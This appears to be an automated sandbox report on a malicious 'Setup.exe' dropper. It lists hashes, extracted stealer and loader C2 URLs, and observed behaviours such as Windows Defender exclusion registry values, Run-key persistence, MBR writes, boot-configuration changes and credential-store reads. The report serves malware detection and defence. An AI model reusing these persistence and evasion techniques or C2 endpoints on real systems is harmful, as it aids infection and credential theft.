Analysis
max time kernel: 125s
max time network: 132s
platform: windows10_x64
resource: win10v20201028
submitted: 13-02-2021 11:08
Static task: static1
Behavioral task: behavioral1 (sample Setup.exe, resource win7v20201028)
Behavioral task: behavioral2 (sample Setup.exe, resource win10v20201028)
General
Target: Setup.exe
Size: 5.0MB
MD5: edeb50f0b803732a581ab558bf87d968
SHA1: 35858ce564d4c8b080bae606bf67292f5b9b2201
SHA256: ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6
SHA512: 8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273
Malware Config
Extracted: smokeloader (version 2020), C2 URLs:
Extracted: raccoon, id 17694a35d42ac97e2cd3ebd196db01b372cce1b0, url4cnc https://telete.in/o23felk0s
Extracted: raccoon, id 027bc1bb9168079d5f7473eee9c05ee06589c305, url4cnc https://telete.in/jjbadb0y
Extracted: metasploit, payload windows/single_exec
Extracted: smokeloader (version 2019), C2 URLs:
Signatures
Glupteba Payload (3 IoCs)
resource  yara_rule
behavioral2/memory/3208-192-0x0000000000400000-0x0000000000C1B000-memory.dmp  family_glupteba
behavioral2/memory/3208-193-0x0000000001590000-0x0000000001D92000-memory.dmp  family_glupteba
behavioral2/memory/3208-195-0x0000000000400000-0x0000000000C1B000-memory.dmp  family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (2 IoCs)
resource  yara_rule
behavioral2/memory/5108-121-0x0000000002360000-0x000000000238E000-memory.dmp  family_redline
behavioral2/memory/5108-126-0x00000000024F0000-0x000000000251C000-memory.dmp  family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
description  pid  Process  procid_target
PID 5716 created 3208  5716  svchost.exe  146
PID 5716 created 6100  5716  svchost.exe  166
PID 5716 created 6100  5716  svchost.exe  166
PID 5716 created 6100  5716  svchost.exe  166
Modifies boot configuration data using bcdedit (15 IoCs)
Process bcdedit.exe, PIDs: 4064, 3100, 4468, 5432, 5436, 5256, 5948, 5892, 6028, 5824, 6080, 6052, 5768, 6108, 5296
Nirsoft (6 IoCs)
resource  yara_rule
behavioral2/files/0x000200000001ab8f-25.dat  Nirsoft
behavioral2/files/0x000200000001ab8f-26.dat  Nirsoft
behavioral2/files/0x000300000001ab8f-34.dat  Nirsoft
behavioral2/files/0x000300000001ab8f-35.dat  Nirsoft
behavioral2/files/0x000300000001a2df-41.dat  Nirsoft
behavioral2/files/0x000300000001a2df-42.dat  Nirsoft
Executes dropped EXE (36 IoCs)
pid  Process
1328  6489A2274AE24900.exe
1196  6489A2274AE24900.exe
4084  1613214372547.exe
2132  1613214377312.exe
3820  1613214382562.exe
188  ThunderFW.exe
3060  MiniThunderPlatform.exe
4040  23E04C4F32EF2158.exe
2192  23E04C4F32EF2158.tmp
1724  seed.sfx.exe
3128  seed.exe
4844  9451.exe
4864  9666.exe
4884  9A8D.exe
5108  A339.exe
3192  9451.exe
4496  AB48.exe
4948  B607.exe
4988  B8A8.exe
5032  updatewin1.exe
1740  updatewin2.exe
4628  updatewin.exe
5052  BFFC.exe
4632  B8A8.exe
3908  jfiag3g_gg.exe
4680  5.exe
3208  C8A8.exe
5336  D0F6.exe
5632  jfiag3g_gg.exe
5748  C8A8.exe
6100  csrss.exe
5292  patch.exe
4372  24E3.exe
5144  2AB1.exe
4732  24E3.exe
5676  SmartClock.exe
Modifies Windows Firewall (1 TTP)
Possible attempt to disable PatchGuard (2 TTPs)
Rootkits can use kernel patching to embed themselves in an operating system.
resource  yara_rule
behavioral2/files/0x000100000001ab91-4.dat  office_xlm_macros
resource  yara_rule
behavioral2/files/0x0004000000000687-79.dat  upx
behavioral2/files/0x0004000000000687-80.dat  upx
behavioral2/files/0x000200000001ac98-151.dat  upx
behavioral2/files/0x000200000001ac98-149.dat  upx
behavioral2/memory/5136-175-0x0000000004270000-0x0000000004271000-memory.dmp  upx
behavioral2/memory/4732-222-0x0000000000400000-0x00000000047FC000-memory.dmp  upx
behavioral2/memory/4732-226-0x0000000000400000-0x00000000047FC000-memory.dmp  upx
resource  yara_rule
behavioral2/memory/5784-241-0x0000000000F20000-0x0000000001939000-memory.dmp  vmprotect
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description  ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation  cmd.exe
Drops startup file (1 IoC)
description  ioc  Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk  24E3.exe
Loads dropped DLL (28 IoCs)
pid  Process
1356  MsiExec.exe
1328  6489A2274AE24900.exe
1328  6489A2274AE24900.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3060  MiniThunderPlatform.exe
3128  seed.exe
4496  AB48.exe
4864  9666.exe
4864  9666.exe
4632  B8A8.exe
4680  5.exe
4680  5.exe
5336  D0F6.exe
5336  D0F6.exe
5336  D0F6.exe
5336  D0F6.exe
5336  D0F6.exe
5336  D0F6.exe
5292  patch.exe
5292  patch.exe
5292  patch.exe
5292  patch.exe
Modifies file permissions (1 TTP, 1 IoC)
pid  Process
5080  icacls.exe
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\AgedGlade = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C8A8.exe = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"  C8A8.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"  C8A8.exe
resource  yara_rule
behavioral2/memory/5784-241-0x0000000000F20000-0x0000000001939000-memory.dmp  themida
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 3 IoCs)
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1b28d49a-b6d6-4a54-ba7e-567865d12d68\\9451.exe\" --AutoStart"  9451.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"  BFFC.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\AgedGlade = "\"C:\\Windows\\rss\\csrss.exe\""  C8A8.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Setup.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  B607.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
86  api.2ip.ua
87  api.2ip.ua
105  api.2ip.ua
131  ip-api.com
Writes to the Master Boot Record (MBR) (1 TTP, 4 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
description  ioc  Process
File opened for modification  \??\PhysicalDrive0  Setup.exe
File opened for modification  \??\PhysicalDrive0  6489A2274AE24900.exe
File opened for modification  \??\PhysicalDrive0  6489A2274AE24900.exe
File opened for modification  \??\PhysicalDrive0  MiniThunderPlatform.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
pid  Process
1108  Setup.exe
Suspicious use of SetThreadContext (5 IoCs)
description  pid  Process  procid_target
PID 1328 set thread context of 2760  1328  6489A2274AE24900.exe  88
PID 1328 set thread context of 1604  1328  6489A2274AE24900.exe  97
PID 1328 set thread context of 3244  1328  6489A2274AE24900.exe  99
PID 4988 set thread context of 4632  4988  B8A8.exe  137
PID 4372 set thread context of 4732  4372  24E3.exe  175
Drops file in Program Files directory (48 IoCs)
Drops file in Windows directory (4 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\Debug\ESE.TXT  MicrosoftEdge.exe
File created  C:\Windows\AppCompat\Programs\Amcache.hve.tmp  WerFault.exe
File opened for modification  C:\Windows\rss  C8A8.exe
File created  C:\Windows\rss\csrss.exe  C8A8.exe
Program crash (1 IoC)
pid  pid_target  Process  procid_target
5136  4948  WerFault.exe  131
Checks SCSI registry key(s) (3 TTPs, 21 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName  6489A2274AE24900.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  B8A8.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  seed.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  AB48.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  AB48.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc  6489A2274AE24900.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000  6489A2274AE24900.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  AB48.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000  6489A2274AE24900.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName  6489A2274AE24900.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  seed.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  B8A8.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  B8A8.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc  6489A2274AE24900.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc  6489A2274AE24900.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  seed.exe
Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  9666.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  9666.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  5.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  5.exe
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
5180  schtasks.exe
1192  schtasks.exe
Delays execution with timeout.exe (3 IoCs)
pid  Process
3888  timeout.exe
5828  timeout.exe
4896  timeout.exe
Kills process with taskkill (3 IoCs)
pid  Process
2832  taskkill.exe
5244  taskkill.exe
5912  taskkill.exe
Modifies Control Panel (1 IoC)
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors  MicrosoftEdge.exe
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdge.exe
Key created  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe
Key created  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdgeCP.exe
Modifies data under HKEY_USERS (64 IoCs)
Modifies registry class 64 IoCs
description ioc Process
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d0097d6cf801d701 MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{162FE4F7-B68F-46A5-9EC7-E8C01703763F} = "0" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = (value omitted) MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe
